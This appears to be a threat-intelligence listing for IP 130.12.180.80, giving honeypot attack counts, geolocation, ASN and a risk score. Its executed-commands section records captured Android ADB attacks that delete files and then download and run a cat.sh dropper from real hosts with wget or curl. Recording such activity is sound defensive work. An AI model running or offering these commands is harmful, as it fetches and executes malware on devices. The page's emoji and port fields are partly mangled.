Active Threat β’ MEDIUM
130.12.180.80
π―
593
Total Attacks
π
3
Ports
π‘
3
Attack Types
π¦
0
Malware
Geolocation
- Country
- πΊπΈ United States
- City
- Unknown
- ASN
- AS214943
- ISP
- Railnet LLC
Attack Types
honeyaml
adbhoney
honeytrap
Attacked Ports
8055555556
Associated Malware
No associated malware
Executed Commands
$
cd /data/local/tmp; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android101x$
cd /data/local/tmp; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android52x$
echo hello18x$
cd /data/local; rm -rf cat.sh; rm -rf iran.*; wget http://130.12.180.80/cat.sh || curl http://130.12.180.80/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android10x$
cd /data/local/tmp; rm -rf *; wget http://130.12.180.80/cat.sh || curl http://45.67.138.196/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android;./cat.sh android3xRisk Assessment
50
/100
LowMediumHighCritical